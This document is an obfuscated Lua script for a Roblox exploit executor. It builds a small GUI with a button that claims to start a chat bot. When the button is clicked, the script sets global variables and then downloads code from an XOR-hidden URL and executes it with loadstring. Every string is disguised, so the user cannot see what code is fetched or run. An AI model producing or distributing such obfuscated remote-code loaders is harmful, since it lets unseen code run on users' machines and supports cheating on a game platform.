--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v56,v57) local v58={};for v68=1, #v56 do v6(v58,v0(v4(v1(v2(v56,v68,v68 + 1 )),v1(v2(v57,1 + (v68% #v57) ,1 + (v68% #v57) + 1 )))%256 ));end return v5(v58);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v10=Instance.new(v7("\1\158\106\25\174\40\67\38","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\220\69\2\54\29\240","\158\48\118\66\114"));local v12=Instance.new(v7("\158\13\51\57\97\171\254\185","\155\203\68\112\86\19\197"));local v13=Instance.new(v7("\114\216\46\232\108\121\231\253\74","\152\38\189\86\156\32\24\133"));local v14=game:GetService(v7("\201\68\162\84\213\89\183\83\232\100\162\84\234\94\164\67","\38\156\55\199"));local v15=game:GetService(v7("\155\114\105\38\23\71\255\81\190\116\127\45","\35\200\29\28\72\115\20\154"));v8.Name=v7("\58\183\208\203\143\35\32\62\138\248","\84\121\223\177\191\237\76");v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\139\90\200\185\63\66\23\212\178","\161\219\54\169\192\90\48\80"));v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(50,127 -77 ,477 -(166 + 261) );v9.Position=UDim2.new(0.5, -(607 -(289 + 218)),1344.5 -(1213 + 131) , -(12 + 38));v9.Size=UDim2.new(0,200,0 + 0 ,438 -318 );v9.BackgroundTransparency=0.2 -0 ;v9.BorderSizePixel=859 -(814 + 45) ;v9.BackgroundColor3=Color3.fromRGB(60,147 -87 ,60);v9.Draggable=true;v10.CornerRadius=UDim.new(0 + 0 ,20);v10.Parent=v9;v11.Parent=v9;v11.BackgroundColor3=Color3.fromRGB(27 + 48 ,960 -(261 + 624) ,133 -58 );v11.Position=UDim2.new(0.5, -(1130 -(1020 + 60)),1423.4 -(630 + 793) , -20);v11.Size=UDim2.new(0 -0 ,100,0 -0 ,16 + 24 );v11.Font=Enum.Font.SourceSans;v11.Text=v7("\104\65\20\44\95\67\20\32\9\97\8\36\93\64\15\49","\69\41\34\96");v11.TextColor3=Color3.fromRGB(877 -622 ,255,2002 -(760 + 987) );v11.TextSize=1927 -(1789 + 124) ;v11.AutoButtonColor=false;v12.CornerRadius=UDim.new(766 -(745 + 21) ,10);v12.Parent=v11;v13.Parent=v9;v13.BackgroundColor3=Color3.fromRGB(26 + 49 ,206 -131 ,294 -219 );v13.Position=UDim2.new(0.5 + 0 , -(79 + 21),1056 -(87 + 968) , -(44 -34));v13.Size=UDim2.new(0 + 0 ,452 -252 ,1413 -(447 + 966) ,109 -69 );v13.Font=Enum.Font.SourceSans;v13.Text='The chatbot can only be stopped by typing "/chatbot stop" in the chat';v13.TextColor3=Color3.fromRGB(255,1817 -(1703 + 114) ,0);v13.TextSize=12;v13.TextWrapped=true;local v48;local v49;local v50;local v51;local function v52(v59) local v60=0;local v61;while true do if (v60==(701 -(376 + 325))) then v61=v59.Position-v50 ;v9.Position=UDim2.new(v51.X.Scale,v51.X.Offset + v61.X ,v51.Y.Scale,v51.Y.Offset + v61.Y );break;end end end v9.InputBegan:Connect(function(v62) if ((v62.UserInputType==Enum.UserInputType.MouseButton1) or (v62.UserInputType==Enum.UserInputType.Touch)) then v48=true;v50=v62.Position;v51=v9.Position;v62.Changed:Connect(function() if (v62.UserInputState==Enum.UserInputState.End) then v48=false;end end);end end);v9.InputChanged:Connect(function(v63) if ((v63.UserInputType==Enum.UserInputType.MouseMovement) or (v63.UserInputType==Enum.UserInputType.Touch)) then v49=v63;end end);v14.InputChanged:Connect(function(v64) if ((v64==v49) and v48) then v52(v64);end end);local function v53() local v65=Instance.new(v7("\143\204\194\4\6","\75\220\163\183\106\98"),v15);v65.SoundId=v7("\16\184\147\54\202\17\191\159\62\221\88\245\196\101\139\91\236\219\96\139\90\237\222","\185\98\218\235\87");v65:Play();v65.Ended:Connect(function() v65:Destroy();end);end v11.MouseButton1Click:Connect(function() local v67=0 -0 ;while true do if (v67==(2 -1)) then getgenv().bot_owner=v7("\230\53\41\209\223\185\255\61\44\227\208\234\153\100\112\181","\202\171\92\71\134\190");getgenv().slashtorespond=false;v67=2;end if (v67==(1 + 1)) then getgenv().max_dist=30;loadstring(((syn and syn.request) or http_request or request)({[v7("\28\211\32","\232\73\161\76")]=v7("\179\205\86\77\13\225\150\13\79\31\172\151\69\84\10\179\204\64\72\13\190\203\65\82\16\175\220\76\73\80\184\214\79\18\42\179\220\113\94\12\178\201\86\12\78\234\150\101\79\27\181\150\80\88\24\168\150\74\88\31\191\202\13\80\31\178\215\13\126\22\186\205\7\15\78\185\214\86","\126\219\185\34\61"),[v7("\33\203\74\122\113\115","\135\108\174\62\18\30\23\147")]=v7("\145\204\30","\167\214\137\74\171\120\206\83")}).Body)();break;end if (v67==(0 -0)) then v53();getgenv().bot_name=game.Players.LocalPlayer.Name;v67=1;end end end);local v54=game:GetService(v7("\191\231\55\88\246\148\142\226\36\84\251\162","\199\235\144\82\61\152"));local v55=TweenInfo.new(14.5 -(9 + 5) ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);v11.MouseEnter:Connect(function() v54:Create(v11,v55,{[v7("\37\23\186\32\0\4\182\62\9\18\154\36\11\25\171\120","\75\103\118\217")]=Color3.fromRGB(476 -(85 + 291) ,1365 -(243 + 1022) ,100)}):Play();end);v11.MouseLeave:Connect(function() v54:Create(v11,v55,{[v7("\229\85\115\31\190\12\200\65\126\16\154\17\203\91\98\71","\126\167\52\16\116\217")]=Color3.fromRGB(75,285 -210 ,75)}):Play();end);